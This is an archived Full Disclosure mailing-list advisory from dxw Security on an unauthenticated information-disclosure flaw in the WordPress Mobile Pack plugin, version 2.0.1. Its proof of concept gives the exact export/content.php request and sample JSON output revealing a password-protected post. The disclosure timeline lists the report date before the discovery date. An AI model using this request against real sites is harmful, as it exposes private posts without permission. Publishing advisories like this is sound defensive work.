Full Disclosure mailing list archives

By Date By Thread Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password protected posts (WordPress plugin) From: dxw Security <security () dxw com>

Date: Wed, 20 Aug 2014 10:31:31 +0000

Details ================ Software: WordPress Mobile Pack Version: 2.0.1 Homepage: http://wordpress.org/plugins/wordpress-mobile-pack/ Advisory report: https://security.dxw.com/advisories/information-disclosure-vulnerability-in-wordpress-mobile-pack-allows-anybody-to-read-password-protected-posts/ CVE: Awaiting assignment CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N) Description ================ Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password protected posts Vulnerability ================ WordPress Mobile Pack contains a PHP file which allows anybody – authenticated or otherwise – to read all public and password protected posts (draft and private posts appear not to be affected). Proof of concept ================ Create a password-protected post Enable WordPress Mobile Pack Visit http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticles&callback=x Your password-protected post is now visible to everybody in the form of JSON wrapped in “x()” Example output: x ( { \"articles\": [ { \"id\": 849, \"title\": \"Secret post\", \"timestamp\": 1406231170, \"author\": \"admin\", \"date\": \"Thu, Jul 24, 2014, 19:46\", \"link\": \"http://wp.local/?p=849\", \"image\": \"\", \"description\": \"<p>HUSH THIS IS A SECRET</p>n\", \"content\": \"\", \"category_id\": 1, \"category_name\": \"Uncategorized\" } ] } ) Mitigations ================ Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/ Please contact us on security () dxw com to acknowledge this report if you received it via a third party (for example, plugins () wordpress org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2014-07-24: Discovered 2014-07-13: Reported to developer via email 2014-08-19: Developer reported the issue fixed 2014-08-20: Advisory published Discovered by dxw: ================ Tom Adams Please visit security.dxw.com for more information. _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password protected posts (WordPress plugin) dxw Security (Aug 20)